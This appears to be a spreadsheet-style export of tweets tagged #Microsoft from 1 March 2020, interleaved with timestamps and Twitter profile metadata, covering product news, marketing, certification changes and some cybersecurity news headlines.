    <t>{'id': 70689903, 'id_str': '70689903', 'name': 'Didem Un Ates', 'screen_name': 'didem_un_ates', 'location': 'London, England', 'description': '@Accenture #Data #AI I #TechWomen100 Champion I Top 50 Most Influential Turks I #NED\nFormerly @Microsoft @CapGemini @Motorola @EY\n@Wharton @CBS Views are my own', 'url': 'https://t.co/vfd801r83c', 'entities': {'url': {'urls': [{'url': 'https://t.co/vfd801r83c', 'expanded_url': 'https://uk.linkedin.com/in/didemunates', 'display_url': 'uk.linkedin.com/in/didemunates', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1337, 'friends_count': 771, 'listed_count': 297, 'created_at': 'Tue Sep 01 14:19:17 +0000 2009', 'favourites_count': 6932, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3352,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'http://pbs.twimg.com/profile_images/1229651983436537856/FzCHnLjL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1229651983436537856/FzCHnLjL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/70689903/1420498346', 'profile_link_color': '4A913C',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</si>
  <si>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Sun Mar 01 11:19:05 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/XaHujPc0x3
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | Microsoft MSDYN365BC https://t.co/UxybUCRrMI</t>
  </si>
  <si>
    <t>Sun Mar 01 11:16:53 +0000 2020</t>
  </si>
  <si>
    <t>Those corporate sellouts make it sound like true #softwareFreedom proponents are the problem or the major nuisance, whereas #ProprietarySoftware giants like #Microsoft are the biggest new allies</t>
  </si>
  <si>
    <t>Sun Mar 01 11:15:05 +0000 2020</t>
  </si>
  <si>
    <t>Luis Villa also cites #microsoft analysts, calling them "friend"
OSI is rapidly becoming dreck. Anything of value in it gradually leaves, #proprietarysoftware agenda enters
It's another #linuxfoundation dreck</t>
  </si>
  <si>
    <t>Sun Mar 01 11:09:46 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Any techie educational people out there use #Microsoft #Yammer? Looking at using #MicrosoftTeams and enriching teaching and learning through this and #Microsoft365, just wondering if others used #Yammer </t>
  </si>
  <si>
    <t>{'id': 175333782, 'id_str': '175333782', 'name': 'Lee Walters', 'screen_name': 'LeeWalters1020', 'location': 'Lincolnshire', 'description': 'Head of #Computing, Tweeting to the nation live - every now and again between watching superhero films ðŸ¦¸ðŸ¦¹', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 41, 'friends_count': 171, 'listed_count': 1, 'created_at': 'Fri Aug 06 09:17:58 +0000 2010', 'favourites_count': 67, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 65, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '5BACC9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme15/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/2190816494/hulk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2190816494/hulk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/175333782/1511123111', 'profile_link_color': 'DFE9ED',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</si>
  <si>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Sun Mar 01 11:05:45 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Teams is First Office App for Linux
 #Azure #Microsoft
https://t.co/B0j1m4bFeE</t>
  </si>
  <si>
    <t>Sun Mar 01 11:03:26 +0000 2020</t>
  </si>
  <si>
    <t>Games with Gold - Mars 2020 https://t.co/oWaPFY0KYk #JeuxVideo #MicroSoft #XBoxOne #XBox360</t>
  </si>
  <si>
    <t>{'id': 2690798316, 'id_str': '2690798316', 'name': 'Twinny Lourson', 'screen_name': 'Twinny_Lourson', 'location': '', 'description': 'Compte twitter du blog ASHOU, page et blog gÃ©rÃ©s par @Twinsunnien', 'url': 'http://t.co/tJ7O932nlX', 'entities': {'url': {'urls': [{'url': 'http://t.co/tJ7O932nlX', 'expanded_url': 'http://twinsunnien.over-blog.com', 'display_url': 'twinsunnien.over-blog.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 72, 'friends_count': 245, 'listed_count': 20, 'created_at': 'Tue Jul 29 19:02:30 +0000 2014', 'favourites_count': 721, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5315,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'http://pbs.twimg.com/profile_images/494198547944722432/MLZ_8yZF_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/494198547944722432/MLZ_8yZF_normal.jpeg',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</si>
  <si>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11:03:18 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft in October last year showcased a foldable #smartphone Surface Duo and now a new report claims that the tech giant may release the dual-screen Android phone months earlier than anticipated. https://t.co/3YLJDmMn6U</t>
  </si>
  <si>
    <t>Sun Mar 01 11:01:54 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is retiring its MCSA, MCSD and MCSE certifications in June 2020 | ZDNet https://t.co/q8B6JK0bIe</t>
  </si>
  <si>
    <t>Sun Mar 01 11:01:24 +0000 2020</t>
  </si>
  <si>
    <t>UK Property &amp;amp; eCommerce customers can now enjoy the benefits of the iProperty Cloud &amp;amp; the Dynamics 365 All-Channel Communications Solution delivered together! #Exciting 
https://t.co/YlePeFQllJ 
#Solgari #Microsoft #Techlabs</t>
  </si>
  <si>
    <t>Sun Mar 01 10:50:56 +0000 2020</t>
  </si>
  <si>
    <t>Remembering Albion as @FableFortune fades out this month, here's the original #visualdevelopment work done for it https://t.co/8c4g8FEnvF via @artstationhq #gameart #madewithunity #indiegame #tcg #conceptart #3danimation #Fable #Microsoft #art #visdev #prop #exploration #design</t>
  </si>
  <si>
    <t>{'id': 293767131, 'id_str': '293767131', 'name': 'Victor Santos', 'screen_name': 'VictorSantos_3D', 'location': 'London (UK)', 'description': "Art Director @Oculus | Co-Founder of @KnittedPixels  |  Unity's NexGen Assets", 'url': 'https://t.co/oQ303HYfxZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/oQ303HYfxZ', 'expanded_url': 'http://victor.artstation.com', 'display_url': 'victor.artstation.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 283, 'friends_count': 215, 'listed_count': 33, 'created_at': 'Thu May 05 23:07:10 +0000 2011', 'favourites_count': 2682, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1398,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'http://pbs.twimg.com/profile_images/930564324870979586/YtnmDuCf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/930564324870979586/YtnmDuCf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/293767131/1560277040',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</si>
  <si>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10:50:04 +0000 2020</t>
  </si>
  <si>
    <t>we will discuss why Microsoft is on top when it comes to providing Business professional services with the best software, regardless of their industry. https://t.co/oblREXlNhU V/ @automeme
#Microsoft #Business #SaaS #Azure #CloudComputing
@DigitalColmer @Hana_ElSayyed</t>
  </si>
  <si>
    <t>{'id': 1031495988857499648, 'id_str': '1031495988857499648', 'name': 'Blockchain', 'screen_name': 'Blockchain_exp', 'location': 'New York, USA', 'description': 'Retweets #Blockchain #BlockExplorer #Cryptographic #AI #ML #Cryptocurrency @IoT #cybersecurity', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1976, 'friends_count': 501, 'listed_count': 32, 'created_at': 'Mon Aug 20 10:59:42 +0000 2018', 'favourites_count': 21916, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 21215, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1145611591360159746/Z_Yhbsmr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1145611591360159746/Z_Yhbsmr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1031495988857499648/1579332703',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</si>
  <si>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10:46:38 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Word Tutorials - How to increase and decrease the indent level of the paragraph
Link - https://t.co/sCPBpfdjFg
#Microsoft #InformationTechnology #technology #computing #technology #computerscience #youtubevideos #youtubechannel #learn #Tutoriales #education https://t.co/IRPqjAzQlw</t>
  </si>
  <si>
    <t>{'id': 3068484222, 'id_str': '3068484222', 'name': 'Domesticated Brain', 'screen_name': 'rasangarocks', 'location': '', 'description': 'This is the official twitter account for web site called Domesticated Brain. We are sharing various kinds of #computer #tutorials and latest #technology news.', 'url': 'https://t.co/ZxzTXr9C8S', 'entities': {'url': {'urls': [{'url': 'https://t.co/ZxzTXr9C8S', 'expanded_url': 'http://www.domesticatedbrain.com/', 'display_url': 'domesticatedbrain.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51317, 'friends_count': 48169, 'listed_count': 645, 'created_at': 'Sun Mar 08 17:13:40 +0000 2015', 'favourites_count': 3262, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5474,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'http://pbs.twimg.com/profile_images/771872242300956672/j1H-OInO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/771872242300956672/j1H-OInO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3068484222/1467544052',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</si>
  <si>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10:40:57 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft + AT&amp;amp;T Partnership delivers 5G #NetworkEdgeCompute Technology
 #iot #Microsoft #NEC #AzureFamily
https://t.co/FbJx2tvSfi</t>
  </si>
  <si>
    <t>Sun Mar 01 10:34:02 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen #Microsoft #Surface #Duo could be #launching #earlier than #expected... https://t.co/uBrymgzw7N</t>
  </si>
  <si>
    <t>{'id': 2525389856, 'id_str': '2525389856', 'name': 'Mohamed Elarby', 'screen_name': 'boomboxfun', 'location': 'Egypt', 'description': '#boomboxfun #social images share The worldâ€™s catalog of ideas #socialimagesshare', 'url': 'https://t.co/OEafjOZ3bs', 'entities': {'url': {'urls': [{'url': 'https://t.co/OEafjOZ3bs', 'expanded_url': 'http://www.socialimagesshare.com', 'display_url': 'socialimagesshare.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4163, 'friends_count': 1667, 'listed_count': 213, 'created_at': 'Mon May 26 16:34:22 +0000 2014', 'favourites_count': 61, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 125382,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'http://pbs.twimg.com/profile_images/772392764646551553/MhhP0vKf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/772392764646551553/MhhP0vKf_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2525389856/1472988214',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</si>
  <si>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10:33:59 +0000 2020</t>
  </si>
  <si>
    <t>The dual-screen #Microsoft #Surface #Duo could be #launching #earlier than #expected... https://t.co/RjslklfC0H</t>
  </si>
  <si>
    <t>{'id': 279483742, 'id_str': '279483742', 'name': 'MOHEMMED', 'screen_name': 'MEDIABOXSTORE', 'location': 'Egypt', 'description': 'A tech blog focused on #blogging tips, #SEO, #socialmedia, #mobile #gadgets, pc tips, how-to guides and general #tips and #tricks https://t.co/LPmSBIePTE', 'url': 'https://t.co/0NFvjlqLX0', 'entities': {'url': {'urls': [{'url': 'https://t.co/0NFvjlqLX0', 'expanded_url': 'https://www.cupbord.com', 'display_url': 'cupbord.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/LPmSBIePTE', 'expanded_url': 'https://www.justfreelearn.com', 'display_url': 'justfreelearn.com', 'indices': [130, 153]}]}}, 'protected': False, 'followers_count': 19782, 'friends_count': 5042, 'listed_count': 1544, 'created_at': 'Sat Apr 09 10:44:55 +0000 2011', 'favourites_count': 2014, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 702508,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'http://pbs.twimg.com/profile_images/460772493095993345/5g2epH0K_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/460772493095993345/5g2epH0K_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/279483742/1554728485',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</si>
  <si>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Sun Mar 01 10:30:30 +0000 2020</t>
  </si>
  <si>
    <t>@fortnitegame #Friday was lit  at microsoft #flagshipstore with friends that have become like family  #amirebensalmi #microsoft https://t.co/KIN0oJujEy</t>
  </si>
  <si>
    <t>{'id': 897939171431591936, 'id_str': '897939171431591936', 'name': 'Amire Ben Salmi', 'screen_name': 'AmireBenSalmi', 'location': 'UK', 'description': '5yr old Amire Ben Salmi is a multi-award winner, author of Because I Am Intelligent, Speaker @The Best You Expo', 'url': 'https://t.co/p63HQEaVwJ', 'entities': {'url': {'urls': [{'url': 'https://t.co/p63HQEaVwJ', 'expanded_url': 'https://www.amazon.co.uk/ben-salmi/s?ie=UTF8&amp;page=1&amp;rh=i%3Aaps%2Ck%3Aben%20salmi', 'display_url': 'amazon.co.uk/ben-salmi/s?ieâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 29, 'friends_count': 36, 'listed_count': 0, 'created_at': 'Wed Aug 16 21:52:36 +0000 2017', 'favourites_count': 144, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 419, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1078056363618680832/4DR_vk59_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1078056363618680832/4DR_vk59_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/897939171431591936/1545863642',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</si>
  <si>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10:28:18 +0000 2020</t>
  </si>
  <si>
    <t>BizTalk Server 2020 in the March 2020 #Microsoft Services Provider Use Rights for #SPLA partners: https://t.co/cYcpCs5hYO</t>
  </si>
  <si>
    <t>Sun Mar 01 10:27:28 +0000 2020</t>
  </si>
  <si>
    <t>Free Microsoft 70-779 Test - Analyzing Data with Microsoft Excel
https://t.co/SJ9TMCzb1n
#microsoft #msexcel #freeTest #freeMockup #mockup #quiz #mockuptest #Free #Engineering #Engineer #PracticeTest #FreeTest https://t.co/uWoWjwExlr</t>
  </si>
  <si>
    <t>{'id': 1211517614804983814, 'id_str': '1211517614804983814', 'name': 'Mobile Apps/Application', 'screen_name': 'Apps4urMobile', 'location': '', 'description': 'We Promote Mobile Application (Apps/Games) Majorly Education Apps', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 20, 'friends_count': 116, 'listed_count': 0, 'created_at': 'Mon Dec 30 05:21:40 +0000 2019', 'favourites_count': 10, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1250, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1211518754439364608/uMC-b_SH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1211518754439364608/uMC-b_SH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1211517614804983814/1577683904',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</si>
  <si>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10:24:33 +0000 2020</t>
  </si>
  <si>
    <t>#Teams-related updates only in the March 2020 #Microsoft Online Services Terms (OST): https://t.co/lp7ezASgWO</t>
  </si>
  <si>
    <t>Sun Mar 01 10:22:03 +0000 2020</t>
  </si>
  <si>
    <t>Free Administering Microsoft SQL Database (Exam 70-764)
https://t.co/2atGoAE9U7
#Microsoft #SQL #SQLDataBase #Database #databases #DBAs #dba #MSDBA #Server #Administrator #Admin #Administration #Practice #freeTest #freeMockup #mockup #quiz #mockuptest #Free https://t.co/4EcecbMWa6</t>
  </si>
  <si>
    <t>Sun Mar 01 10:20:04 +0000 2020</t>
  </si>
  <si>
    <t>Want to know what it takes to become a #Microsoft #MVP? 
Take a look at our blog to find out: https://t.co/bjFtR4x8od https://t.co/4w8wbdcfLO</t>
  </si>
  <si>
    <t>Sun Mar 01 10:18:59 +0000 2020</t>
  </si>
  <si>
    <t>VDA Add-on for #Microsoft 365, more generous Microsoft 365 F1 terms and more in the March 2020 Product Terms: https://t.co/8xuY7Ei1Pw.</t>
  </si>
  <si>
    <t>Sun Mar 01 10:10:01 +0000 2020</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</si>
  <si>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20425, 'friends_count': 21659, 'listed_count': 166, 'created_at': 'Thu Jun 25 16:20:49 +0000 2009', 'favourites_count': 4530, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 68668,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</si>
  <si>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Sun Mar 01 10:00:19 +0000 2020</t>
  </si>
  <si>
    <t>30% of all phishing emails sent in a day, make it past the security measures a company implements. #CyberCriminals pose as either #Amazon or #Microsoft when sending such emails? Avoid becoming a victim of #phishing by using intelligent scans and implementing layered security. https://t.co/8zrtKy1TEU</t>
  </si>
  <si>
    <t>{'id': 1095590936149721089, 'id_str': '1095590936149721089', 'name': 'Quarphix', 'screen_name': 'Quarphix_', 'location': '676 Gallagher Avenue, Midrand', 'description': 'Quarphix Corporation is a multi-discipline ICT, Training and Business Consulting company, servicing a diverse range of clients across various industries.', 'url': 'https://t.co/5kC1xaKwTM', 'entities': {'url': {'urls': [{'url': 'https://t.co/5kC1xaKwTM', 'expanded_url': 'https://www.quarphix.co.za', 'display_url': 'quarphix.co.za', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 4, 'friends_count': 10, 'listed_count': 0, 'created_at': 'Wed Feb 13 07:50:09 +0000 2019', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1106478321985093632/WSAE4FqO_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1106478321985093632/WSAE4FqO_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1095590936149721089/1583218916',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</si>
  <si>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10:00:11 +0000 2020</t>
  </si>
  <si>
    <t>#INNOVATE, #COMMUNICATE AND #FACILITATE Honest Approach, Reliable Service, Open Book Policy, Highest Level of Service. Contact #Sumillion today on 03330111897 #bethebest #honest #reliable #lenovo #fujitsu #dell #hp #hpe #microsoft #cisco</t>
  </si>
  <si>
    <t>{'id': 700986799854899202, 'id_str': '700986799854899202', 'name': 'Sumillion', 'screen_name': 'Sumillion', 'location': 'Basingstoke, England', 'description': 'At Sumillion we look to Innovate, Communicate and Facilitate.  We consult, design, ratify, build, supply, install and support. 0333 0111 897', 'url': 'https://t.co/F0gyxvlErP', 'entities': {'url': {'urls': [{'url': 'https://t.co/F0gyxvlErP', 'expanded_url': 'http://www.sumillion.com', 'display_url': 'sumillion.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 178, 'friends_count': 1698, 'listed_count': 1, 'created_at': 'Sat Feb 20 10:14:11 +0000 2016', 'favourites_count': 445, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 474, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/700994764032888833/8sAVQK_Y_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/700994764032888833/8sAVQK_Y_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/700986799854899202/1455964810',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</si>
  <si>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10:00:02 +0000 2020</t>
  </si>
  <si>
    <t>"We need to have diversity in more management and leadership positions because diversity attracts diversity."  #IWD2020.  #WomenTechMakers  #stem #microsoft #WomenInSTEM #WomenInScience #100daysofcode #girlswhocode https://t.co/9gZNDn3kMz</t>
  </si>
  <si>
    <t>Sun Mar 01 10:00:01 +0000 2020</t>
  </si>
  <si>
    <t>The first episode in Microsoft's new series around #quantum computing and the impact it's having today. #Microsoft # Edgecomputing #AI #healthcare #climatechange https://t.co/cEkazyEunX</t>
  </si>
  <si>
    <t>Sun Mar 01 09:56:47 +0000 2020</t>
  </si>
  <si>
    <t>Bill Gates was officially the youngest billionaire when he reached this astounding feat in 1987 at the humble age of 31.  #BillGates #Microsoft #FunFacts #TheMoreYouKnow
#BILLIONAIRE</t>
  </si>
  <si>
    <t>{'id': 1185396278068469761, 'id_str': '1185396278068469761', 'name': 'Neato Facto', 'screen_name': 'NeatoFacto', 'location': '', 'description': 'A Twitter page dedicated to educating users with nothing but fun and interesting facts!', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1, 'friends_count': 1, 'listed_count': 0, 'created_at': 'Sat Oct 19 03:24:39 +0000 2019', 'favourites_count': 7,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'http://pbs.twimg.com/profile_images/1234734223380144129/pMTA19Id_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234734223380144129/pMTA19Id_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1185396278068469761/1582969092',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</si>
  <si>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09:49:59 +0000 2020</t>
  </si>
  <si>
    <t>A #TrickBot #malware #campaign targets patched #computers running #Microsoft's #Windows10. The #Russian #cybercrime #enterprise attempts to disable #Windows 10 #security #protections. https://t.co/izEWVs0wpO</t>
  </si>
  <si>
    <t>Sun Mar 01 09:48:17 +0000 2020</t>
  </si>
  <si>
    <t>At #TechAd we demonstrate how we make vehicles more autonomous, safe and connected: #ISO26262 functional safety, #Microsoft #Azure (enabling vehicles receiving useful information and utilization of big data) and our #Motar solution. https://t.co/drdN39C3Zr https://t.co/L55aUtmkpw</t>
  </si>
  <si>
    <t>{'id': 593635444, 'id_str': '593635444', 'name': 'ICT Group', 'screen_name': 'ICT_Group', 'location': '', 'description': 'ICT Group is a leading industrial technology solutions and services provider. We link people, technology and ideas. Making the world a little smarter every day.', 'url': 'http://t.co/kp2W5D2dhK', 'entities': {'url': {'urls': [{'url': 'http://t.co/kp2W5D2dhK', 'expanded_url': 'http://www.ict.eu', 'display_url': 'ict.eu', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 550, 'friends_count': 317, 'listed_count': 25, 'created_at': 'Tue May 29 11:47:26 +0000 2012', 'favourites_count': 71, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 978,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'http://pbs.twimg.com/profile_images/1186608071721795584/_A9r4nKC_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1186608071721795584/_A9r4nKC_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/593635444/1575538768', 'profile_link_color': '0097B1',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</si>
  <si>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09:47:06 +0000 2020</t>
  </si>
  <si>
    <t>FREE EVENT: Codeless AI Apps in Microsoft Office 365 Powerapps
In collaboration with @CloudstreetC @ntpowerplatform 
RSVP https://t.co/ufw1yx6g9y  
https://t.co/Cm3x8FdkI9 
#powerbi #microsoft #powerapps #dashboard #businessintelligence #data #dataanalytics  #microsoftpowerbi https://t.co/Pknk1GqBUM</t>
  </si>
  <si>
    <t>Sun Mar 01 09:45:03 +0000 2020</t>
  </si>
  <si>
    <t>We look at the market-moving events that have shaped equity markets this week  Click here to find out more  https://t.co/SShoJt0Zdo
#coronavirus #airlines #China #Italy #Brexit #Mastercard #Marriott #Microsoft #tech #IPOs #Barclays #Disney #VirginGalactic https://t.co/61pNEaJX3a</t>
  </si>
  <si>
    <t>Sun Mar 01 09:32:13 +0000 2020</t>
  </si>
  <si>
    <t>Recently, a former employee of the tech giant #Microsoft, Volodymyr Kvashuk, who worked at Microsoft from August 2016 to June 2018, was convicted in U.S. District Court in Seattle for stealing 10 million dollars in #digitalcurrency from the Microsoft.
https://t.co/MnsdG8BVsj</t>
  </si>
  <si>
    <t>{'id': 1205501684425691136, 'id_str': '1205501684425691136', 'name': 'ðŸ…²ðŸ†ˆðŸ…±ðŸ…´ðŸ†ðŸ†‚ðŸ…´ðŸ…²ðŸ†„ðŸ†ðŸ…¸ðŸ†ƒðŸ†ˆ-ðŸ…·ðŸ…°ðŸ…²ðŸ…ºðŸ…¸ðŸ…½ðŸ…¶ ðŸ…½ðŸ…´ðŸ††ðŸ†‚', 'screen_name': 'cybernews001', 'location': '', 'description': 'Cyber Security Awareness ðŸŽ—ðŸ’»\nRead Hacking related newsðŸ“°\nFOLLOW US ðŸ›«\nðŸ’»Register Bug Bounty Course ðŸ’°\n#cybersecurity #ethicalhacking\n\nCyber Security BlogðŸ‘‡', 'url': 'https://t.co/VbQtQRrXb6', 'entities': {'url': {'urls': [{'url': 'https://t.co/VbQtQRrXb6', 'expanded_url': 'https://bkhackers-on-security.blogspot.com', 'display_url': 'bkhackers-on-security.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 62, 'friends_count': 56, 'listed_count': 0, 'created_at': 'Fri Dec 13 14:56:57 +0000 2019', 'favourites_count': 232, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 189, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233089416886808576/BDJWRcZp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233089416886808576/BDJWRcZp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1205501684425691136/1576249562',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</si>
  <si>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09:31:00 +0000 2020</t>
  </si>
  <si>
    <t>#DELL #HPE #NetApp #Fujitsu #Lenovo #DataCore #WesternDigital #Polycom #Samsung #Huawei #Nutanix #RedHat #Oracle #Microsoft #CommVault #VMWare #SAN #NAS #Intel #SapHana #Veritas #OpenStack #enterprise #Server #Storage #Client  We' got it all! Contact us Today @Sumillion</t>
  </si>
  <si>
    <t>{'id': 1133319467621081089, 'id_str': '1133319467621081089', 'name': 'Data Storage', 'screen_name': 'DataStorage2', 'location': 'Basingstoke, England', 'description': 'Enterprise storage is a centralised repository for business information that provides common data management, protection and data sharing functions', 'url': 'https://t.co/F0gyxvlErP', 'entities': {'url': {'urls': [{'url': 'https://t.co/F0gyxvlErP', 'expanded_url': 'http://www.sumillion.com', 'display_url': 'sumillion.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 1124, 'listed_count': 3, 'created_at': 'Tue May 28 10:29:51 +0000 2019', 'favourites_count': 1386, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3739,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'http://pbs.twimg.com/profile_images/1133319745263079424/Aji5EnJ6_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1133319745263079424/Aji5EnJ6_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1133319467621081089/1559312557',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</si>
  <si>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09:30:16 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft hopes its technology will help Americans trust voting again  https://t.co/W5PGfn1tH3</t>
  </si>
  <si>
    <t>Sun Mar 01 09:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Growing up with two parents who are deaf, The dad who helped raine an engineer. #Microsoft.  #AIforAccessibility  #WomenInSTEM #WomenInScience  #technology #tech #education https://t.co/snWxRq3wvd</t>
  </si>
  <si>
    <t>Sun Mar 01 09:28:28 +0000 2020</t>
  </si>
  <si>
    <t>@ronenabr By far one of the better things that came out of #Microsoft . Also integration with Github is phenomanal</t>
  </si>
  <si>
    <t>{'id': 2752603525, 'id_str': '2752603525', 'name': 'Tal Kachman', 'screen_name': 'TalKachman', 'location': 'Cambridge, MA', 'description': 'X Research staff member @IBM in ML and DL. physicists and simulation abuser par excellence. Opinions are my own not of my employer', 'url': 'https://t.co/A9OwiniyHU', 'entities': {'url': {'urls': [{'url': 'https://t.co/A9OwiniyHU', 'expanded_url': 'http://talkachman.com', 'display_url': 'talkachman.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 125, 'friends_count': 561, 'listed_count': 3, 'created_at': 'Thu Aug 21 17:03:45 +0000 2014', 'favourites_count': 919, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/776840085434163201/gk-RUQkr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/776840085434163201/gk-RUQkr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2752603525/1413154306',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</si>
  <si>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09:25:49 +0000 2020</t>
  </si>
  <si>
    <t>Former Software Engineer, Convicted For Defrauding Microsoft Of Over $10 Million https://t.co/MVysMdUsC1 #bitcoin #microsoft #crypto #cryptocurrency #news #bitcoin</t>
  </si>
  <si>
